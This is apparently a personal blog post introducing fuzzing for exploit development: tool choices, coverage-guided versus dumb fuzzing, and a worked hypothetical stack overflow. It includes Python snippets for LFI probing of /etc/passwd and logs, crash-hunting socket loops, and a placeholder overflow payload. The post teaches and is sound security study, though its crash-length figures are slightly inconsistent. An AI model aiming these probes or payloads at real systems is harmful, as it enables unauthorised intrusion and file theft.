05 - How to maybe not be so bad at fuzzing, Part 1

05 - Back to the Fuzzing


Alright, in previous posts I've utilized fuzzing to 'locate' crashes in applications, but definitely ran into a lot of problems whilst doing it.  As I've alluded to, this blog is more about the learning experience than it is about showing folks exactly how to do things, primarily because I'm a pretty big n00b at a lot of this stuff, anyway.  Alas, I'm learning and improving daily.

Part one of the fuzzing post will cover the more informational aspects of fuzzing: what fuzzing is, how it is used, and some of the available tools, plus a short example of a basic buffer overflow and its relation to fuzzing.

In part two, I'll go into greater detail with some of the currently available network fuzzers, and how to use them.

01 - What is fuzzing?

The term gets thrown around a lot.  It's not complicated, but perhaps I should start here.  Fuzzing is the practice of sending (via whatever medium) an application 'junk' data, usually in an effort to locate crashes, vulnerabilities, and/or unintended or unexpected behavior-- mainly, just to see what happens.

Fuzzing can be used in many situations, from network-based or file-based fuzzing to fuzzing specific API calls in operating systems.  In situations such as network fuzzing, we're typically attempting to send junk data over the wire to see how the application responds-- from the exploit development standpoint, we want to trigger a crash.  This doesn't necessarily need to be crafted packets sent over FTP; fuzzing also applies to simple things such as an HTTP GET request.  Folks can argue this however they like, but the core concepts are applicable.

Let's say you've located an LFI vulnerability.  You've done some enumeration, and you probably want to expedite the process of locating sensitive files.  Trying lots of files by hand, unless you know exactly what to pull (/etc/passwd, for instance) really sucks and it takes time.  This is, although rudimentary, a great use case for fuzzing.  Forced browsing itself is a form of fuzzing.  Tools like dirb, dirbuster, Burp's content discovery, gobuster, etc, are all a form of fuzzing, though not what people typically think of when the term is used.
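As a rough sketch of that idea, a handful of lines of Python with the requests library is enough to automate the guessing.  The target URL, parameter name, and candidate paths below are all hypothetical placeholders, not a recipe:

import requests

# Hypothetical target and wordlist -- adjust everything for your own testing.
base_url = "http://192.168.1.10/index.php"
candidates = [
    "../../../../etc/passwd",
    "../../../../etc/hosts",
    "../../../../var/log/auth.log",
]

for path in candidates:
    r = requests.get(f"{base_url}?page={path}", timeout=5)
    # Crude signal: a noticeably different response size often means the include worked.
    print(r.status_code, len(r.text), path)

In practice you'd swap that tiny list for a proper wordlist and a smarter success check, but the loop itself is all the 'fuzzer' really is.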

Let's think about another application of fuzzing: network based.  Normally you'll be looking at applications from the client / server model.  To be clear, fuzzing HTTP is also network based fuzzing, as its protocol operates over a, duh, network, but we won't deal so much with semantics in these cases.  Let's look at how an FTP client / server model works.

If we boot up Wireshark or watch packets another way, we see the first part of a typical TCP connection, the three-way handshake.  Once our 3WHS has completed, we effectively have a session on the FTP server.  Generally, the FTP server will initially respond with something akin to a banner and will await data from the client.  Depending on the server's configuration, it expects specific kinds of commands to be sent to it.  If we wanted to put a file on the FTP server, we'd use the client's PUT command (which goes over the wire as STOR).

The server sees a well-formed packet from our FTP client that says "PUT <this-file> on the server".  As long as all criteria are met, such as the file existing on the client, the PUT command is enabled, the packet follows the RFC, and the proper permissions exist on the server, the server should oblige.  Some data (including the file) will be sent over the wire and reconstructed as a new file on the server.
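For reference, that happy path looks something like this from the client side using Python's standard ftplib module.  The host, credentials, and file name are made up for illustration:

from ftplib import FTP

# Hypothetical server and credentials, purely for illustration.
ftp = FTP("192.168.1.10")
ftp.login("user", "password")

# The client-side 'put': ftplib issues a STOR command and streams the file.
with open("report.txt", "rb") as f:
    ftp.storbinary("STOR report.txt", f)

ftp.quit()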

So, yeah, pretty normal; but how does fuzzing relate to this?  Well, a couple of important things were mentioned above.  At the most basic level, we can look at it from the 'criteria' standpoint for two specific details:
  • The server expects specific commands
  • A 'well-formed' packet is sent
First off, ask yourself this: "What happens if I send an invalid command to an FTP server?"

Well, in most cases the FTP server will just nope you right out.  It doesn't care; it expects an apple and you gave it a rock.  It doesn't know what to do with a rock, and frankly it couldn't care less.  It knows this isn't an apple, and it ignores it.

Right?

Secondly, what happens when a malformed packet is sent?  Well, you'd hope for the same, of course. The server should see the packet, see that it isn't of the proper format and again, ignore it.

Right?
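It's easy enough to poke at this yourself with a few lines of Python against a test server and just watch what comes back.  The address below is hypothetical:

import socket

# Hypothetical FTP server -- the point is just to watch how it reacts.
with socket.create_connection(("192.168.1.10", 21), timeout=5) as s:
    print(s.recv(1024))                          # banner, e.g. b'220 Welcome...'
    s.sendall(b"ROCK\r\n")                       # a command no RFC defines
    print(s.recv(1024))                          # typically a 500-style 'unknown command' reply
    s.sendall(b"USER " + b"A" * 2000 + b"\r\n")  # a malformed / oversized argument
    print(s.recv(1024))                          # a well-behaved server still answers and carries on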

In the case of FTP, where it's a long known, accepted and standardized protocol, we have RFCs to define proper packet... etiquette, you could say.  RFCs are essentially just a way to standardize protocols so we as humans can agree upon some sort of 'right' way to use them.  Computers don't think for themselves (most? currently?), so as with any program / programming language, we need a way to define the proper way to talk to them.  It's similar to language constructs.

We mostly agree on how English is spoken, for example, so if I were to start a sentence off with 'Goodbye, how time be me after?' you probably wouldn't really understand what I was trying to say.  Computers and humans alike can still attempt to process that information, but only one of them can really parse it properly.  It still won't really make sense, as it's malformed English, but we as humans can apply abstract thought to it and start to try to 'fix' what happened.

Computers don't have that option, unless we give it to them via programmatic means.  AI is obviously a different story, but even in that case, we need to teach an AI machine the necessary skills to not just 'ignore' the malformed information and have some way of dealing with it.  A typical FTP server will not have any idea what to do with malformed packets, and should just ignore them.

That should is where things get fun for us though.

Obviously, there are a lot of intricacies, complexities and caveats to the above analogies-- take it all with a grain of salt, but the concepts are valid.

02 - Tools


With the plethora of fuzzing platforms that exist, it can be hard to find one that you:
  • Enjoy using
  • Don't get fed up with halfway through setting it up
I primarily use boofuzz and SPIKE as I'm normally only fuzzing network applications.

Truth be told, I have an affinity towards boofuzz primarily because it's written in python, a language I'm 'familiar' with, but also for its documentation.  That seems a bit silly-- you'd think most tools have some sort of documentation, though oftentimes I find myself revisiting PowerPoint presentations to find out something useful about SPIKE or Sulley, etc.

Admittedly, boofuzz's documentation, while thorough, still leaves a cryptic feel in my mind when I review it.  The lack of examples can make things a little confusing at times as far as how I think something is supposed to be used versus how the creator intended it.  I frequently find myself trying to implement a feature, only to find I'm using it outrageously wrong.

That's fine and all, really, part of the fun for me is figuring out the best use case for tools and how to apply them to solve a problem.

boofuzz is attractive to me for a few reasons:
  • Ease of use / implementation
  • Python (woo)
  • PEDRPC / ProcMon
  • Extensible
  • Fairly fast
  • Lots of test cases
  • Highly customizable
Most are pretty straightforward.  Later on we'll look at some use case examples of what boofuzz has to offer, and where it may not be necessary.

Some tools made specifically for fuzzing:

  • SPIKE
    • No longer in development, still a great tool
  • Sulley
    • SPIKE's successor, no longer in development
  • boofuzz
    • Sulley's successor, actively developed
  • radamsa
    • Generate 'randomized' data for use in fuzzing
  • AFL (American Fuzzy Lop)
    • Coverage-guided fuzzer
  • LibFuzzer
    • Coverage-guided fuzzer
  • and many, many more...

Overall, there is a ridiculous number of tools that have been created specifically with fuzzing in mind, as well as tons of tools out there that can be leveraged to fuzz with.  As expected, it's fairly easy to make a rudimentary fuzzer by just writing a script to throw lots of data at an application.  With the plethora of available tools, it can be hard choosing between them.  Really, the best bet is to break down the objective and not overthink the 'problem'.  Generally it's good to ask yourself what you're trying to accomplish.

If you're planting a garden, there's no reason to use a backhoe when a small shovel will do.  Sure, both might work, but there's not a compelling argument to be made for the former besides that it will work.  It's just unnecessary.

The same can be said for fuzzing.  If you're just sending ever-growing strings at a server, you may find it easier to just write a while loop in python with sockets.  If, however, you're trying to see what data the server likes or dislikes, it's probably going to be easier to use a fuzzer like SPIKE instead.
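That 'while loop in python with sockets' really is about as simple as it sounds.  Here's a minimal sketch; the host, port, and step size are arbitrary placeholders:

import socket

host, port = "192.168.1.10", 9999   # hypothetical target service
length = 100

while True:
    payload = b"A" * length
    print(f"[*] sending {length} bytes")
    try:
        with socket.create_connection((host, port), timeout=5) as s:
            s.recv(1024)                      # banner, if the service sends one
            s.sendall(payload + b"\r\n")
            s.recv(1024)                      # if this errors or times out, something broke
    except OSError:
        print(f"[!] no response at {length} bytes -- possible crash, time for a debugger")
        break
    length += 100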

Breaking the problem down is your best bet when choosing a plan.  I frequently find myself writing HTTP requests out in python and using sockets prior to remembering that the 'requests' library exists, for instance.  To understand what the best tool for the job is, it's important to understand the different types of fuzzing that exist.

03 - Types of Fuzzing

Alright, so I'm absolutely not going to cover "every type of fuzzing ever", as I probably haven't even heard of them all.

Coverage-Guided Fuzzing

I noted this above when referring to AFL and LibFuzzer.  Personally, I don't have any experience with this type of fuzzing beyond familiarity with the concept.

'Coverage-Guided', or just 'Guided', is a type of fuzzing intended to 'cover' an application or library's code surface.  With guided fuzzing, a library (e.g. a DLL) will be tested via a function / API call.  The guided fuzzer will send some data, drawn from a set of sample inputs referred to as the corpus, to the target and map out the path the code follows.  The fuzzer will then mutate those inputs and send them again.  This hopefully results in more and more 'code coverage'.  Guided fuzzers can be thought of as creating a flowchart of application logic when presented with certain values.  If you've ever looked at IDA Pro or graphed a function using Olly or Immunity, the guided fuzzer builds a 'similar' model of the target.

Guided fuzzing is extremely useful as it enables testers and developers alike to create a map of a function to track down bugs, find anomalous behavior, or just make sure things are working as intended.  There are many scholarly articles published relevant to guided fuzzing, and a lot of tools out there to do it.  Really, the best way to learn about this type of fuzzing is to try it.
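I haven't done much more than toy with this myself, but as a sketch of what a coverage-guided harness can look like in Python, here's a toy example using Google's Atheris (assuming it's installed via pip).  The parse_record target is entirely made up:

import sys
import atheris

def parse_record(data: bytes):
    # Toy stand-in for real library code: the 'bug' hides behind a specific
    # prefix, and each byte comparison is a branch that coverage feedback
    # helps the fuzzer discover one step at a time.
    if len(data) >= 4 and data[0:1] == b"F" and data[1:2] == b"U" \
            and data[2:3] == b"Z" and data[3:4] == b"Z":
        raise RuntimeError("bug reached")

def TestOneInput(data):
    parse_record(data)

if __name__ == "__main__":
    atheris.instrument_all()
    atheris.Setup(sys.argv, TestOneInput)
    atheris.Fuzz()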


Dumb / Smart Fuzzing

Strictly speaking, these two names, 'dumb' and 'smart', are misnomers.  There isn't necessarily a dumb fuzzer, nor a smart one for that matter, but the two names separate behaviors of fuzzing.  Smart fuzzing specifically describes a fuzzer that may 'learn' from results or modify its corpus in a more... directed fashion.  An example of smart fuzzing would be the guided fuzzing that was discussed above.  These are considered 'smart' fuzzers because they are built to make decisions, or analyze results and apply relevant test cases in a fashion that makes them seem smart.  Smart fuzzers may be syntactically aware, or even have the ability to recognize what type of input should be sent by learning from observation, responses, or even the library itself.

People often consider fuzzers that are 'aware' of input (and adjust accordingly) smart.  This is in direct contrast to a fuzzer which might not necessarily be 'aware' of the application's or library's expected input, but attempts to throw everything but the kitchen sink at it.  Fuzzers that aren't built with the ability to make decisions, but rather send arbitrary, or even directed, data at an application would be considered 'dumb'.  A dumb fuzzer may have a set list of corpora that will be sent.  This list is likely iterated through until the end, or until the application stops receiving for whatever reason.
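A bare-bones version of that behavior might look like the sketch below: a fixed list of corpora, no feedback, and the only 'intelligence' is noticing when the (hypothetical) target stops answering:

import socket

# A deliberately 'dumb' run -- every test case is predetermined.
corpora = [
    b"A" * 5000,
    b"%s" * 200,
    b"%n" * 200,
    b"\x00" * 1000,
    b"../" * 300,
]

for i, corpus in enumerate(corpora):
    try:
        with socket.create_connection(("192.168.1.10", 9999), timeout=5) as s:
            s.sendall(corpus + b"\r\n")
            s.recv(1024)
    except OSError:
        print(f"[!] target stopped responding on test case {i}")
        break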

Many fuzzers are extensible, especially those you write yourself.  You may find it necessary to fuzz a server in a more automated fashion, rather than manually inspecting every crash that may be generated.  In cases like these, it's possible to utilize debugger APIs to attach to the target, dump relevant crash data, restart the process, reattach, and continue fuzzing.  This is a way to add some utility to a fuzzer, dumb or smart.

The prefix 'dumb' definitely applies a negative stigma to the tool.  That's unfortunate, as a dumb fuzzer is just as capable as a smart fuzzer in its expected applications.  As alluded to earlier, choose the right tool for the job.

04 - A, AA, AAA, AAAA, AAAAAAAAAAAAAAAAAAAAAAAAAA...

If you've fuzzed applications in the past, the above probably looks familiar for more reasons than just being the first letter of the English alphabet, repeated a bunch.  For those of you who may be unfamiliar with the process, the above is a pretty boring, although effective, style of fuzzing: sending larger and larger payloads of 'junk' data at an application.

Why is this important?  Well, think of it like this:
  • An application expects data to be sent and it will store it in a buffer
    • The buffer space allotted by the developer is 96 bytes
  • We send ever increasing amounts of 'A's at the server.  
  • The server stores each payload in its available buffer
  • Once we reach 104 'A's, what happens?
If the application has any built-in error handling, or the buffer is truncated to the available size and superfluous data dropped, everything might be fine.  However, even with built-in error handling, depending on its implementation, everything might not be fine.

This is the quintessential buffer overflow.  To help those to whom this may be a new concept, let's look at it visually.

We'll make a few assumptions of a hypothetical program:
  1. The application expects a maximum of 96 bytes to be sent 
  2. The application does not check the size of the data that is sent
  3. The application has no protections in place, such as stack cookies, DEP, etc
In later posts, I'll discuss stack cookies (the /GS flag), DEP, and other protections.

There are some initial instructions that almost all functions start with, referred to as the function prologue.  First, the EBP register, which serves as the frame pointer, is pushed onto the stack, saving the previous frame's base.  The next instruction updates EBP with the value of ESP (the current stack frame), so we could 'trace' back the application's flow by following the saved EBP values if we wanted.  Then, XX bytes are subtracted from ESP to make room for local variables.  In our program, it could look like the following:

push ebp      ; Save the location of the previous stack frame
mov ebp,esp   ; Place ESP into EBP, updating the value with the current stack frame
sub esp,0x60  ; subtract 0x60 (96) bytes from ESP (makes room for local variables, our buffer)

At this point, our stack looks like the following:
00402000    00000000 ; 96 (0x60) bytes lower, ESP now points here after the sub
00402004    00000000
00402008    00000000
...
00402060    00401111 ; saved EBP-- top of the current stack frame
00402064    00401000 ; return address, saved via call to function
...
00402FFF    00000000 ; higher addresses-- toward the base of the stack

The next instructions in our program are responsible for looping through the received data and placing the values onto the stack.  Since ESP now points 96 bytes down the stack, at 00402000, the copy loop advances its write pointer four bytes after each move instruction until all of the data has been copied.

If the application does not check how much data we sent, and the looping function continues to write to the stack until the buffer is exhausted, there might be a problem.  Let's assume we send a 104 byte buffer of A's to the application.  That should likely cause some problems, but two questions remain: why 104 bytes and what happens?

Since we know the saved return address was placed onto the stack at location 00402064 (by the call), and EBP was then pushed just below it, a buffer length of 104 bytes-- 96 to fill the buffer, 4 over the saved EBP, and 4 more over the return address-- will overwrite the saved return address.

Let's look at how this plays out:
       ____________________ ____________ ____________
      |   96 Byte Buffer   | Saved EBP  |  Ret Addr  |
      |____________________|____________|____________|

       AAAAAAAA......AAAAAA     AAAA         AAAA
            (96 bytes)        (4 bytes)    (4 bytes)    =  104 bytes

Looking at the stack, it's pretty obvious:
00402000    41414141
00402004    41414141
00402008    41414141
...                     ; 96 bytes of A
00402060    41414141    ; Saved EBP overwritten
00402064    41414141    ; Saved return address, overwritten!
...
00402FFF    00000000    ; higher addresses-- toward the base of the stack

Once our function completes, a return instruction occurs.  This is the 'what happens' part.  When the return, ret (0xC3), executes, the application leaves the current function by popping the value at the top of the stack-- the saved return address slot-- into EIP.  Since our write loop ran right past the 96-byte buffer and overwrote that saved address, the function is going to attempt to return to '41414141'.

This isn't necessarily conducive to exploiting the application, however.  Although we control EIP by pointing the return address at user-controlled code, the only way to exploit the application in its current state is to find a location in memory that jumps or calls back to the start of our buffer (something equivalent to esp-0x68 once the ret has executed).  Still, that would only leave us with 96 bytes to write shellcode.  Enough for calc, or something akin to it, but typical reverse and bind shells take at least 250-300 bytes.

What can we do about that?  Well, remember the loop function we (made up) talked about earlier?  That just keeps on writing until either the end of the stack is hit (and nothing more can be written, so the application dies or invokes SEH) or until no more data remains to copy.  Looking toward the higher addresses near 00402FFF, there is plenty of space to write more data.

At this point, we send as much data as we need for shellcode and place it in the buffer space just after the saved return address.  When the ret executes, ESP points right at that space, which we also control.  So instead of squeezing into the 96-byte buffer, we can replace the return address we overwrote with the address of a 'jmp esp' instruction found somewhere in memory; execution then lands directly on our data after the return address, giving us plenty of room for shellcode (or at least a short jump to it).
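To make that layout concrete, here's roughly how such a payload could be assembled in Python.  The gadget address, target, and 'shellcode' below are placeholders, not real values:

import socket
import struct

# Everything here is hypothetical -- it only shows the shape of the final buffer.
JMP_ESP   = 0x77DEADBE                    # made-up address of a 'jmp esp' instruction
shellcode = b"\xcc" * 300                 # placeholder int3s instead of real shellcode

payload  = b"A" * 96                      # fill the 96-byte local buffer
payload += b"B" * 4                       # clobber the saved EBP
payload += struct.pack("<I", JMP_ESP)     # overwrite the saved return address
payload += shellcode                      # lands right where ESP points after the ret

with socket.create_connection(("192.168.1.10", 9999), timeout=5) as s:
    s.recv(1024)
    s.sendall(payload + b"\r\n")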

05 - Takeaways


There are many potential ways to exploit the above hypothetical application, but they all started with fuzzing.  Sending more and more bytes to the application caused a crash at 100 A's.  That doesn't mean we can't experiment after initial fuzzing to see if sending more bytes is possible, though!  In this case, the first crash is only indicative of an issue in how the data is being processed, and further investigation is required.

  • Remember that fuzzing is not the end all, be all of locating crashes.
  • It's still necessary to take the time to analyze crashes you might locate to see if they might be exploitable.
  • Many, many awesome bugs have been uncovered by fuzzing, but fuzzers don't know how to exploit a crash-- they can just make it visible.
  • Not all crashes will be exploitable!  If you've read my previous posts about fuzzing, you'll see that I struggled with a particular crash's available buffer space.  Don't be afraid to jot down crash info and move on.
  • You will learn more by doing, as understanding the concepts is only part of the task.


In the next post, I'll spend some time showing some examples of fuzzing templates, writing some in python socket loops, using SPIKE, and utilizing boofuzz to fuzz for us.

